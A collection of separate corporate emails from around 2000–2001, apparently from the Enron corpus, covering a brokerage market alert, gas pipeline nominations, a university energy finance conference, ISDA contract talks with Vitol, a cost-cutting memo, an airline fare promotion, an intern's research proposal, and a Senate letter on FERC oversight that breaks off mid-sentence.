p.m. EDT) ** DirecTV, a unit of General Motors' (GM: 63.98, + 1.08) Hughes Corp. (GMH: 19.32, + 0.02) division, is preparing to sue about 1 million people who are pirating DirecTV's signal using unauthorized access cards and equipment, according to The Wall Street Journal. DirecTV wants damages from the illegal users and has shifted its focus from the distributors of the equipment to the many who use it. As many as 100,000 names and addresses were collected from searches of alleged illegal equipment operators. DirecTV has sent strongly worded mailings to the individuals suspected of pirating the digital signals. ** Large utility firm Entergy (ETR: 37.54, + 0.25) reported fiscal second-quarter earnings that beat Wall Street's recently raised estimates. The company reported earning almost $239 million, or $1.06 per share, versus roughly $224 million, or $0.98 per share, in the year-ago quarter. Analysts had the company pegged to earn $0.95 on average. Strong profits from its nuclear power and energy trading divisions helped boost earnings. ** Online brokerage firm Ameritrade Holdings (AMTD: 6.41, + 0.50) agreed on Tuesday to acquire rival firm National Discount Brokers Group, which is a subsidiary of Deutsche Bank AG. The price tag was $154 million in an all-stock deal in which Ameritrade will issue between 21 million and 32 million shares to finance the deal. When the deal is finally complete, National Discount Brokers will own between 10% and 14% of Ameritrade's stock. ---------------------------------------------------------------- RESEARCH SPOTLIGHTS ** Goldman Sachs upgraded shares of Freeport McMoran Copper & Gold Inc. (FCX: 10.73, + 0.23) from a market outperformer to their U.S. recommended list. ** Salomon Smith Barney upgraded shares of Express Scripts (ESRX: 58.00, + 0.96) from an outperform to a buy rating. ** A.G. Edwards upgraded shares of DST Systems (DST: 47.02, + 0.57) from an accumulate to a buy rating. ################################################################ Log in using the links below to: Access your account: https://investing.schwab.com/trading/start?SANC=CCBodyi&NeedCASelValue=Y View your Email Alert customization options: https://investing.schwab.com/trading/start?SANC=EAMyAlerts Perform research or request a market quote: https://investing.schwab.com/trading/start?SANC=Quotes Place a trade order: https://investing.schwab.com/trading/start?SANC=TradeStock To visit Schwab's home page, use this link: http://www.schwab.com/ ----------------------------------------------------------------- To unsubscribe or modify your Email Alert customization options, log in using the link below or copy and paste it into your browser's address window: https://investing.schwab.com/trading/start?SANC=EAMyAlerts Now you can receive graphics Email Alerts in HTML format, using helpful, full-color graphics and active Web links that connect you directly to information you want. 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Company: 002909 Arng: 39229-09137 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 0 62 Working 0 62 Capacity Allocation 0 62 Confirmed 0 24 CBL Company: 002909 Arng: 39229-09253 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 0 4,739 Working 0 4,739 Capacity Allocation 0 4,739 Confirmed 0 4,735 CBL Company: 002909 Arng: 39229-10166 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 5,256 0 Working 5,256 0 Capacity Allocation 5,256 0 Confirmed 0 CBL 0 Company: 002909 Arng: 39229-10167 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 4,054 0 Working 4,054 0 Capacity Allocation 4,054 0 Confirmed 0 CBL 0 Company: 002909 Arng: 39229-10168 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 5,000 0 Working 5,000 0 Capacity Allocation 5,000 0 Confirmed 0 CBL 0 Company: 002909 Arng: 39229-10169 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 2,500 0 Working 2,500 0 Capacity Allocation 2,500 0 Confirmed 0 CBL 0 Company: 002909 Arng: 39229-10171 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 10,000 0 Working 10,000 0 Capacity Allocation 10,000 0 Confirmed 1 CBL 0 Company: 002909 Arng: 39229-10172 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 32,060 0 Working 32,060 0 Capacity Allocation 32,060 0 Confirmed 29,945 CBL 0 Company: 002909 Arng: 39229-10173 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 11,138 0 Working 11,138 0 Capacity Allocation 11,138 0 Confirmed 10,404 CBL 0 Company: 002909 Arng: 39229-10174 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 1,476 0 Working 1,476 0 Capacity Allocation 1,476 0 Confirmed 1,379 CBL 0 Company: 002909 Arng: 39229-10175 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 1,636 0 Working 1,636 0 Capacity Allocation 1,636 0 Confirmed 1,528 CBL 0 Company: 002909 Arng: 39229-10190 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 12,000 0 Working 12,000 0 Capacity Allocation 12,000 0 Confirmed 11,209 CBL 0 Company: 002909 Arng: 39229-10230 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 0 274 Working 0 274 Capacity Allocation 0 274 Confirmed 0 0 CBL Company: 002909 Arng: 39229-10261 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 0 1,100 Working 0 1,100 Capacity Allocation 0 1,100 Confirmed 0 0 CBL Company: 002909 Arng: 39229-10281 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 7,530 0 Working 7,530 0 Capacity Allocation 7,530 0 Confirmed 7,034 CBL 0 Company: 002909 Arng: 39229-10282 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 10,000 0 Working 10,000 0 Capacity Allocation 10,000 0 Confirmed 9,341 CBL 0 Company: 002909 Arng: 39229-10291 Eff Date: 2001-06-04 ----- Receipt ----- ----- Delivery ----- Quantity Cut CD Quantity Cut CD Nominated 600 0 Working 600 0 Capacity Allocation 600 0 Confirmed 300 CBL 0
FYI ---------------------- Forwarded by Karen Marshall/HOU/ECT on 01/18/2001 03:07 PM --------------------------- "Angela Dorsey" <[email protected]> on 01/18/2001 02:53:59 PM To: <[email protected]> cc: Subject: RE: URGENT DEADLINE: RSVP by JAN 22nd: Invitation to 2001 Energy FinanceConference Feb. 22-23, 2001- The University of Texas at Austin Karen, Thanks for the extra support in getting the word out. I've had a couple RSVP's from Enron. Sincerely, Angela -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Wednesday, January 17, 2001 7:59 PM To: [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; [email protected] Cc: [email protected]; [email protected]; [email protected]; [email protected]; [email protected]; Angela Dorsey Subject: URGENT DEADLINE: RSVP by JAN 22nd: Invitation to 2001 Energy FinanceConference Feb. 22-23, 2001- The University of Texas at Austin The $500 registration fee is waived for any Enron employee who wishes to attend this conference because of our relationship with the school. Please forward this information to your managers and staff members who would benefit from participating in this important conference. (Note: Vince Kaminski is a panellist for the Risk Management Session 3.) Please note: The deadline for RSVP & Hotel reservations is MONDAY, JANUARY 22nd Don't miss this opportunity! Should you have any questions, please feel free to contact me at EXT. 37632. Karen ---------------------- Forwarded by Karen Marshall/HOU/ECT on 01/11/2001 07:38 PM --------------------------- "Angela Dorsey" <[email protected]> on 01/10/2001 03:06:18 PM To: "Angela Dorsey" <[email protected]> cc: "Ehud Ronn" <[email protected]>, "Sheridan Titman (E-mail)" <[email protected]> Subject: Invitation to 2001 Energy Finance Conference - The University of Texas at Austin Colleagues and Friends of the Center for Energy Finance Education and Research (CEFER): Happy New Year! Hope you all had a wonderful holiday season. On behalf of the University of Texas Finance Department and CEFER, we would like to cordially invite you to attend our: 2001 Energy Finance Conference Austin, Texas February 22 - 23, 2001 Hosted by the University of Texas Finance Department Center for Energy Finance Education and Research Dr. Ehud I. Ronn and Dr. Sheridan Titman are currently in the process of finalizing the details of the conference agenda. We have listed the agenda outline below to assist you in your travel planning. Each conference session will be composed of a panel discussion between 3 - 4 guest speakers on the designated topic. As supporters of the Center for Energy Finance Education and Research, representatives of our trustee corporations (Enron, El Paso, Reliant, Conoco, and Southern) will have the $500 conference fee waived. The conference package includes Thursday evening's cocktails & dinner and hotel/UT shuttle service, as well as Friday's conference meals, session materials and shuttle service. Travel to Austin and hotel reservations are each participant's responsibility. A limited number of hotel rooms are being tentatively held at the Radisson Hotel on Town Lake under the group name "University of Texas Finance Department" for the nights of Thursday, 2/22/01 and Friday, 2/23/01 (the latter evening for those who choose to stay in Austin after the Conference's conclusion). To guarantee room reservations, you will need to contact the Radisson Hotel at (512) 478-9611 no later than Monday, January 22nd, and make your reservations with a credit card. Please let me know when you have made those arrangements so that I can make sure the Radisson gives you the special room rate of $129/night. Please RSVP your interest in attending this conference NO LATER THAN JANUARY 22nd to [email protected], or (512) 232-7386, as seating availability is limited. Please feel free to extend this invitation to your colleagues who might be interested in attending this Conference. Center for Energy Finance Education and Research PROGRAM OF THE 2001 ENERGY FINANCE CONFERENCE February 22 - 23, 2001 Thursday, Feb 22: 3:00 p.m. Reserved rooms at the Radisson Hotel available for check-in 5:30 p.m. Bus will pick up guests at the Radisson for transport to UT Club* 6:00 p.m. Cocktails, UT Club 9th Floor 7:00 p.m. Dinner, UT Club 8:00 p.m. Keynote Speaker 9:00 p.m. Bus will transport guests back to hotel Friday, Feb 23: 7:45 a.m. Bus will pick up at the Radisson for transport to UT 8:30 a.m. Session 1 - REAL OPTIONS Panelists: Jim Dyer, UT (Chair) Sheridan Titman, UT John McCormack, Stern Stewart & Co. 10:00 a.m. Coffee Break 10:15 a.m. Session 2 - DEREGULATION Panelists: David Eaton, UT (Chair) David Spence, UT Jeff Sandefer, Sandefer Capital Partners/UT Peter Nance, Teknecon Energy Risk Advisors 11:45 a.m. Catered Lunch & Keynote Speaker 1:30 p.m. Guest Tour - EDS Financial Trading & Technology Center 2:00 p.m. Session 3 - RISK MANAGEMENT Panelists: Keith Brown, UT (Chair) Vince Kaminski, Enron Alexander Eydeland, Southern Co. Ehud I. Ronn, UT 3:30 p.m. Snack Break 3:45 p.m. Session 4 - GLOBALIZATION OF THE ENERGY BUSINESS Panelists: Laura Starks, UT (Chair) Bob Goldman, Conoco Ray Hill, Southern Co. 5:15 p.m. Wrap-Up 5:30 p.m. Bus picks up for transport to airport/dinner 6:30 p.m. Working dinner for senior officers of Energy Finance Center Trustees *We have made arrangements to provide shuttle service between the Radisson hotel and UT during the conference. However, if you choose to stay at an alternative hotel, then transportation to conference events will become your responsibility. ************** Angela Dorsey Assistant Director Center for Energy Finance Education & Research The University of Texas at Austin Department of Finance, CBA 6.222 Austin, TX 78712 [email protected] **************
Sara Firstly, thanks for the message. I am indeed the right person for ISDA's in Vitol. I did meet with your credit people in London ( David Hardy and Lee Munden) and we did discuss the idea of replacing the existing agreement. I am at present in our office in Rotterdam, but will be back in Geneva tomorrow. I therefore do not have the existing agreement with me, but I seem to remember that it is just signed with Vitol SA Inc, which is the US branch office of the main trading company in the Vitol Group, Vitol SA, which is a Swiss company registered in Geneva. I would suggest that you send us a proposal for an ISDA agreement with Vitol SA, set up as a multibranch company about to trade out of its Geneva and Houston office, and with Vitol Holding BV (the ultimate parent company of the group) as the credit support provider. I would hope that once we have agreed terms for the basic schedule and credit support annex, we can then easily add other Vitol or Enron companies as appropriate. Regards, David David Fransen Vitol SA Geneva Tel : 00-41-22-322-1111 ********************************************************************** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the sender. ********************************************************************** -----Original Message----- From: Sara Shackleton [mailto:[email protected]] Sent: 31 May 2000 15:20 To: [email protected] Subject: Undeliverable: Master Agreement (financial) between Enron North A merica Corp. ( "ENA") and Vitol S.A. ("Vitol") ----- Forwarded by Sara Shackleton/HOU/ECT on 05/31/2000 08:19 AM ----- |--------+-----------------------> | | System | | | Administrator| | | <postmaster@V| | | itol.com> | | | | | | 05/30/2000 | | | 11:31 AM | | | | |--------+-----------------------> >--------------------------------------------------------------------------- -| | | | To: [email protected] | | cc: | | Subject: Undeliverable: Master Agreement (financial) between | | Enron North A merica Corp. ( "ENA") and Vitol S.A. ("Vitol") | >--------------------------------------------------------------------------- -| Your message To: [email protected] Cc: Tanya Rohauer Subject: Master Agreement (financial) between Enron North America Corp. ( "ENA") and Vitol S.A. ("Vitol") Sent: Tue, 30 May 2000 17:27:07 +0100 did not reach the following recipient(s): [email protected] on Tue, 30 May 2000 17:31:42 +0100 The recipient name is not recognized The MTS-ID of the original message is: c=US;a= ;p=Vitol;l=LDN0040005301631L7L87HSX MSEXCH:IMS:Vitol:LONDON:LDN004 0 (000C05A6) Unknown Recipient Message-ID: <[email protected]> From: Sara Shackleton <[email protected]> To: [email protected] Cc: Tanya Rohauer <[email protected]> Subject: Master Agreement (financial) between Enron North America Corp. ( "ENA") and Vitol S.A. ("Vitol") Date: Tue, 30 May 2000 17:27:07 +0100 Return-Receipt-To: Sara Shackleton <[email protected]> MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) X-MS-Embedded-Report: Content-Type: text/plain; charset="iso-8859-1" I am a derivatives lawyer with ENA in Houston and obtained your name through one of my traders who is transacting with Jay Carr in Houston (please see attached message below). When I spoke with Jay earlier this month, I asked him for the name of a lawyer but was advised that all Vitol lawyers were in New York and that he would pass my message along to a lawyer. I am assuming that you are the trading lawyer who can assist me with negotiating an ISDA Master Agreement between our respective companies. If not, please let me know and feel free to pass this message on to the appropriate attorney. On April 12, 1995, Enron Capital & Trade Resources Corp., predecessor in title to ENA, and Vitol S.A., Inc. entered into a Master Agreement which is one of ENA's early energy price swap agreements. Since our companies are currently trading weather derivatives, I think you would agree that it would be prudent to supersede the existing agreement with an ISDA Master Agreement. This relates to my conversation with Jay in that we confirmed our weather deals under the existing master but incorporated the 1991 and 1993 ISDA definitions into the confirms of our weather trades. Please let me hear from you. You can reach me via email, phone (713/853-5620) or fax (713/646-3490). ----- Forwarded by Sara Shackleton/HOU/ECT on 05/30/2000 11:14 AM ----- |--------+-----------------------> | | Sara | | | Shackleton | | | | | | 05/05/2000 | | | 11:47 AM | | | | |--------+-----------------------> >--------------------------------------------------------------------------- -| | | | To: [email protected] | | cc: | | Subject: Master Agreement (financial) between Enron North America| | Corp. ("Enron") and Vitol S.A. | >--------------------------------------------------------------------------- -| Jay: I am a lawyer with Enron. I called for you on Friday, you're out, and no one else could help. I would like to speak with a Vitol lawyer about (1) replacing our existing financial master with an ISDA (to accommodate a broader range of products) and (2) specifically incorporating the relevant ISDA definitions into the recent weather transaction confirmations even though the master is an early master energy price swap agreement. Please call me at 713 853-5620 with the information so that we can move quickly. Thank you for your help. Sara
At Enron, we,re good at a lot of things: making markets, commoditizing products, managing risk, offering innovative energy solutions to customers ) the list goes on and on. However, one of the things we could do a lot better is watching our expenses. We,re all shareholders in this company, and we need to spend our company,s dollars as wisely as we spend our own. There are some simple, yet significant measures each of us can take to make sure we,re careful with Enron,s money. The Policy Committee has approved and recommended the following: ? Professional Services ) This is our largest area of discretionary spending, at more than $600 million last year. &Professional Services8 includes our contracts with outside law and accounting firms, contractors and other consulting groups. To make sure that we are negotiating the best rates and terms of service for the company across business units, we are requiring all future professional service contracts and those up for renewal to be negotiated through or in consultation with Global Strategic Sourcing (GSS), effective July 1. In addition, contracts for more than $5,000 must be pre-approved by the business unit senior executive or their designee and GSS. For more information, see http://ibuyit.enron.com. ? On-line expense reporting tool XMS ) XMS, our online expense reporting tool, enables us to expedite, monitor and report expenses. Effective July 1, all employees on domestic U.S. payroll will be required to use XMS for reimbursement of business-related expenses. To access XMS, go to http://xms.enron.com/. ? Enterprise wide portal ) We currently have 122 internal web sites across the company. The amount of technology work, marketing collateral, and other related costs required to develop and support so many portals is sizeable. It makes sense to have one Enron portal so you can efficiently access content and services through a single, personalized channel that will make it easier for you to find information and perform basic tasks online. This new company-wide portal, under the leadership of Tony Mends, will be launched in several phases beginning this fall. Another significant area where we can be more diligent in our spending is travel and entertainment. Enron has long had travel policies in place. As we have grown, we have not done as well as we should have in communicating those policies to new employees and reminding all employees to take advantage of the discounts we have negotiated. The availability of discounts and booking services online should make it easy to save money for the company without sacrificing the comfort of employees who travel. The following are common sense recommendations that we should all adhere to when traveling for business. Any regular deviations from these travel policy recommendations will be reviewed by each business unit leader. ? Air travel ) Employees are requested to use either Travel Agency in the Park (TAP) or the GSS-approved preferred travel agency for your location - all of which have access to the significant airfare discounts negotiated by GSS - or http://clicktrip.enron.com/enron, the new online travel booking service that allows employees to book their own travel with the same negotiated discounts. Employees who fly in the United States should book non-refundable coach tickets, which are typically 65 percent less than refundable tickets and can usually be changed by simply paying a $100 fee. For this reason, we strongly encourage all employees to purchase non-refundable domestic coach tickets when possible. ? Lodging ) GSS has also negotiated preferred rates at a number of hotel chains in many cities worldwide to accommodate each business unit,s individual hotel policy. We recommend that you use Enron,s list of preferred hotels to select accommodations that are in line with your business unit,s policies. You can view the list at http://travel.enron.com. ? Car rental services ) When renting a car for business travel, employees should use our preferred car rental agencies ) National (U.S. and Canada) and Alamo (U.S.)- since the agreements we have negotiated are intended to protect you and Enron through the insurance coverage in our contract. Visit http://travel.enron.com for details and updates to services available outside the U.S. ? Off-site meetings ) All domestic-U.S. off-site meetings and events with more than 10 people should be coordinated through GSS, which will negotiate preferred rates for Enron. They can be reached at (713) 646-8311. Because there are differences between business units and offices, each business unit leader will follow up this memo with a communication further elaborating on these policies as they apply to their business unit. Each of us has a responsibility to make sure we do our part to ensure Enron retains its competitive edge. These recommendations are some basic, sensible actions we can take company-wide, but it is up to every employee to look for cost saving measures and do what makes sense in your daily activities. If you have an idea or a suggestion you would like to share with us, please e-mail us at [email protected]. A list of questions and answers about these policies is posted on http://ibuyit.enron.com/gss/ibuyit/csfaq.doc. If you have additional questions, Policy Committee member Kevin Hannon will host an eSpeak on Tuesday, June 19 at 10 a.m. Houston time to discuss these cost saving recommendations.
This NetClub offer includes: 1) Lucky Fares Week 43 2) Icelandair Holidays - Thanksgiving Express / CHECK-MATE in Iceland / Scandinavia / Icelandair Open Bridge Tournament 3) Icelandair/Hertz Car Rental and Icelandair Hotels. 4) British Booking Center - South East England Tour 5) eurobreaks.net - London on sale! 6) icelandtotal.com - All You Want To Know About Iceland. ________________________________________________________ For purchase on/before 30 October 2001 - by 12 Noon. Depart between 27 October and 14 November 2001. Return no later than 21 November 2001. Minimum stay: Saturday night. Taxes are additional to the fares listed below. Approximate taxes by destination can be found at http://www.icelandair.com/taxes 1) Lucky Fares - Week 43 Depart from Baltimore Travel to: Reykjavik - $350usd London, Glasgow, Paris, Frankfurt, Amsterdam - $300usd Oslo, Stockholm, Copenhagen - $450usd Depart from Boston Travel to: Reykjavik - $350usd London, Glasgow - $278usd Paris, Frankfurt, Amsterdam - $300usd Oslo, Stockholm, Copenhagen - $450usd Depart from New York (JFK) Travel to: Reykjavik - $350usd London, Glasgow, Amsterdam - $250usd Paris, Frankfurt - $325usd Oslo, Stockholm, Copenhagen - $415usd Depart from Orlando Travel to: Reykjavik - 400usd Amsterdam - $275usd London, Glasgow, Frankfurt, Paris - 350usd Oslo, Stockholm, Copenhagen $500usd Depart from Minneapolis Travel to: Reykjavik - $375usd London, Glasgow - $300usd Paris, Amsterdam, Frankfurt - $375usd Oslo, Stockholm, Copenhagen - $450usd For purchase on/before 30 October 2001 - by 12 Noon. Depart between 27 October and 14 November 2001. Return no later than 21 November 2001. Minimum stay: Saturday night. Availability is limited. ________________________________________________________ *Due to the current world travel climate, Lucky Fares tickets are changeable, within the validity of the fare, for a $150 (usd) fee until further notice. Changes are subject to restrictions, please contact the Internet Desk for further assistance. Call 1-800-223-5500 ext 2 prompt 2 or email [email protected] Please include your confirmation number in your email, or have your ticket available when you call. ________________________________________________________ HOW TO BOOK: This Lucky Fare must be booked and confirmed online. To make your booking, please visit: http://www.icelandair.com/lucky Please read the Terms and Conditions before you make a request. Requesting a Lucky Fares booking means that you acknowledge the following: -Lucky Fares are not refundable, not good for future travel if passengers are unable to travel on the dates booked, not transferable to anyone else once ticketed. -Lucky Fares are valid for new purchases only. -Icelandair requires check-in a minimum of 3 hours before departure. -Lucky Fares do not accrue frequent flyer points and do not offer child or senior discounts. -Infants without a seat pay 10% of the adult fare plus applicable tax. -Lucky Fares are subject to limited availability. No fare is ever guaranteed until purchased. All passengers are requested to reconfirm their flights within 72 hours of departure. ________________________________________________________ 2) From Icelandair Holidays Thanksgiving Express from 499usd per person double, plus taxes. http://www.icelandair.com/specials CHECK-MATE in Iceland: Join Icelandair Holidays for a mini "Chess Adventure." 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For more information please visit us at: http://www.britishbookingcenter.com/lucky_fares14.htm ________________________________________________________ >From eurobreaks.net 5) London on sale! Here's your chance to visit fabulous, cosmopolitan, exciting London this fall or winter, at our lowest prices ever! Enjoy roundtrip Icelandair flights, 3 nights at the Norfolk Plaza Hotel with daily buffet breakfast, taxes and service fees, from only $499 per person! Add extra nights in London, at specially reduced prices, or opt to add a 4 day / 3 night stay in elegant Paris from only $299 extra, including London - Paris flight, first class hotel, daily full breakfast and more... For full details, visit www.eurobreaks.net/londononsale.htm ________________________________________________________ >From icelandtotal.com 6) "All You Want To Know About Iceland" http://www.icelandtotal.com ________________________________________________________ To stop receiving email from Icelandair, please reply with a blank message and one word REMOVE in the subject line. To update your address or mailing preferences, including your departure region, please visit: http://www.icelandair.com/editprofile
Vince, both Matt and April think that this type of research would be value-additive to EBS. I will be out all next week in a meeting with John Griebling and other on a deal that is being worked out. I understand that you are following up with HR on all of our summer intern offers. Please make sure Palo is given an offer and that he will work with April and Matt (he did talk to Matt) on the topics that April and I suggested. Regards, Ravi. ----- Forwarded by Ravi Thuraisingham/Enron Communications on 02/20/00 12:41 AM ----- Matt Harris 02/17/00 08:08 PM To: Ravi Thuraisingham/Enron Communications@Enron Communications cc: April Hodgson/Enron Communications@Enron Communications Subject: Re: Summer Intern: Paulo Oliveira Looks interesting. I would guess that there is a TON of research available (from @Home, AOL, Roadrunner, Real, Microsoft, etc.) on Broadband's impact on the strategic value of web properties. Compiling this would be very helpful. MH Ravi Thuraisingham 02/17/00 12:15 PM To: April Hodgson/Enron Communications@Enron Communications, Matt Harris/Enron Communications@Enron Communications cc: Subject: Summer Intern: Paulo Oliveira Hi April & Matt, here is additional information on the summer intern that I've mentioned. Matt, I know you know nothing about this! My discussion with April on the possible research topic let me (& April) to believe that you would provide great input on what the student can work on while he is here. Regards, Ravi. EBS Research ----- Forwarded by Ravi Thuraisingham/Enron Communications on 02/17/00 02:09 PM ----- Stinson Gibner@ECT 02/17/00 11:23 AM To: Vince J Kaminski/HOU/ECT@ECT cc: Ravi Thuraisingham/Enron Communications@Enron Communications, Thomas D Gros/HOU/ECT@ECT Subject: Summer Intern: Paulo Oliveira Vince: Here is the information that I have on Paulo. He would be slated to work for the summer with April Hodgeson and Matt Harris on how streaming media products may add value to advertising or some related area. Actually, he would also be a good fit for helping to think ways to analyze our Enron On-line data. I have asked if he can send a resume. In the mean time, most of his relevant information is attached below. --Stinson ---------------------- Forwarded by Stinson Gibner/HOU/ECT on 02/17/2000 11:14 AM --------------------------- Paulo Rocha e Oliveira <[email protected]> on 02/10/2000 12:04:56 PM To: "Stinson Gibner" <[email protected]> cc: Subject: Re: Trip to Houston Stinson, Thank you for your e-mail. My phone number is (617) 492-9551. I graduated from Princeton University in 1996 (mathematics), and came straight to MIT for a Ph.D. in Operations Management at the Sloan Schoolof Management. In my first three years I took all the required coursework in mathematics, optimization, stochastic processes, etc., as well as a number of courses in psychology (at MIT and Harvard). I am working with Prof. Gabriel Bitran, and I am interested in the mathematical modeling of service operations. In particular, I am interested in the interaction between customers and companies (hence the interest in psychology). The (tentative) title of my PhD thesis is "Pricing Substitute Products on the Internet", and I am sending you the summary which I sent to Tom Gros a few weeks ago that will give you an idea of what this research is about. Thanks again, and I'm looking forward to meeting you and your research group next week. Paulo Pricing Substitute Products on the Internet Objective: To develop new tools to decide pricing policies for goods and services sold on the internet. Motivation: This research is motivated by the fact that traditional choice and optimization models are not appropriate for internet-related businesses. The technological innovations associated with the internet brought about an overload of information which inevitably affects the ways in which consumers make choices. Furthermore, companies have a great deal of influence on how much information consumers can have access to. The problem of pricing substitute products is an important strategic issue faced by internet companies. Consumers usually search for generic products (e.g. VCRs or computers) without knowing exactly what they will buy. Companies can show different products and different prices to each consumer. This type of flexibility was not available until the internet came about. The problem of pricing substitute products is not unique to the internet. The methodology developed by this research should be transferable to a number of other settings, such as pricing services. Services are unique, and there are many cases where customers will only buy one of many services offered by a given company. Our model will help companies decide which services to offer to which customers and how much to charge for these services. Research Strategy: Our research strategy is to divide the pricing problem into two components which can be combined to generate optimal pricing strategies. These components are choice models and optimization models. Choice Models: Choice models describe how customers make choices. The management literature draws on two main sources for these models: psychology and economics. The common approach in psychology models is to use what are called heuristic elimination methods. These methods consist of the elimination of options based on the sequential elimination of features until only one choice remains. These methods tend to be very context-specific and do not lend themselves very easily to mathematical analysis. Economists focus on utility-maximing models that are significantly more mathematically tractable than psychological models. The most common economic model of choice is the logit model. The problem with these types of models is that they are not very accurate reflections of how consumer make choices on the internet. The first step in our research will be to develop choice models that capture the interactions going on between customers and companies on the internet. Optimization: Traditionally, the optimization problem consists of maximizing revenue over a certain planning horizon. On the internet, the problem of maximizing revenue still exists, but there is also a need to learn about customers. Short term profit is based on sales, but long term profit is based on how well you know your customers and are able to retain them. The optimization problem must therefore include a short term component (sales) and a long term component (learning).
Sue Mara Enron Corp. Tel: (415) 782-7802 Fax:(415) 782-7854 ----- Forwarded by Susan J Mara/NA/Enron on 04/17/2001 03:03 PM ----- "Weller, Andrea" <[email protected]> 04/17/2001 03:01 PM To: "'[email protected]'" <[email protected]> cc: "'Fairchild, Tracy'" <[email protected]>, "'[email protected]'" <[email protected]> Subject: FW: SENATORS CALL FOR INVESTIGATION INTO EFFECTIVENESS OF FEDERAL ENERGY REGULATION I thought you should all be aware that this call is out there.... Andrea Weller Market Strategist Strategic Energy, LLC 949.230.3404 [email protected] SENATORS CALL FOR INVESTIGATION INTO EFFECTIVENESS OF FEDERAL ENERGY REGULATION Senators Joe Lieberman, D-Conn., and Jean Carnahan, D-Mo., have asked the General Accounting Office (GAO) to inquire into whether the Federal Energy Regulatory Commission (FERC) is carrying out its responsibilities to ensure that wholesale electricity sales throughout the country are reasonable and that interstate natural gas pipelines are fulfilling their obligations to customers. "Under federal law, FERC has the responsibility to ensure just and reasonable prices for interstate wholesale transmission," the Senators said in a letter to GAO, "but there is mounting evidence that FERC may not have fulfilled this role in the California situation." Following is text of the letter: April 12, 2001 Mr. David M. Walker Comptroller General of the United States U.S. General Accounting Office 441 G Street, N.W. Washington, D.C. 20548 Dear Mr. Walker: We have been watching with dismay as the state of California suffers sporadic rolling blackouts with impacts on electricity supplies and prices throughout the western United States, a situation that may get worse this summer when the demand for electricity increases. We understand that there are many factors that have contributed to the current situation, and few short term options to create more electricity for this market. At the same time we are extremely troubled that California's Independent System Operator (ISO) recently asserted that suppliers of electricity in California have allegedly been charging many times more than what it actually costs to generate the electricity, an overcharge amounting to $6.8 billion according to the operator. Some experts believe that these high prices reflect a non-functioning market that has, in turn, exacerbated the state's electricity shortage.With the possibility of electricity deregulation occurring soon in additional states such as Missouri, we are concerned whether there is adequate federal oversight to guard against potential abuse of market power by suppliers. Without such oversight, the nation may not progress towards achieving what many see as the promise of deregulation: lower consumer prices, greater reliability, increased choice, and more efficient generation. Deregulation legislation being considered in Missouri would transfer the oversight authority from the Missouri Public Service Commission (PSC), which works closely with the utilities to provide direction if there are capacity or reliability concerns and sets appropriate customer rates, to the Federal Energy Regulatory Commission (FERC). Under federal law, FERC has the responsibility to ensure just and reasonable prices for interstate wholesale transmission, but there is mounting evidence that FERC may not have fulfilled this role in the California situation. FERC Commissioner William Massey recently said: "Ensuring just and reasonable prices in wholesale markets requires that we clearly define market power, and aggressively intervene when the markets are not producing reasonable prices. The commission's actions to date have been insufficient." (March 20, 2001 testimony to the House Energy Committee's Subcommittee on Energy and Air quality).We are requesting that the General Accounting Office (GAO) assess whether FERC is properly exercising its role to enforce reasonable electricity rates. Specifically, we ask GAO to answer the following questions: 1) Has FERC fulfilled its mandate to ensure just and reasonable rates? Is FERC adequately monitoring and appropriately regulating based on its statutes power supply, demand, and pricing in California? In other Western states? In the Central Midwest and in the Northeast? 2) Has FERC devoted sufficient resources to carry out its oversight obligations in a timely and effective manner? And does FERC have the necessary resources to carry out its future oversight role? 3) Does FERC need additional authority to carry out its mission of ensuring just and reasonable prices given that widespread partial deregulation is now occurring in so many states? 4) As we understand the situation from some experts, the number of transactions in electricity that occur in the deregulated wholesale market place is voluminous. This situation may increase the difficulties of guarding against market abuse. Is there a role for another agency or independent organization to exercise an oversight role with respect to these transactions? If so, what would be an appropriate oversight role? 5) We have been advised by some experts that greater transparency of prices relating to the buying and selling of electricity in a deregulated market would help guard against market abuses. We understand the need to keep prices confidential for a period of time to ensure against collusion. After this appropriate period of time has passed, would greater transparency be beneficial? We are also concerned about recent allegations by the California Public Utility Commission (CPUC) that market power has been abused in the 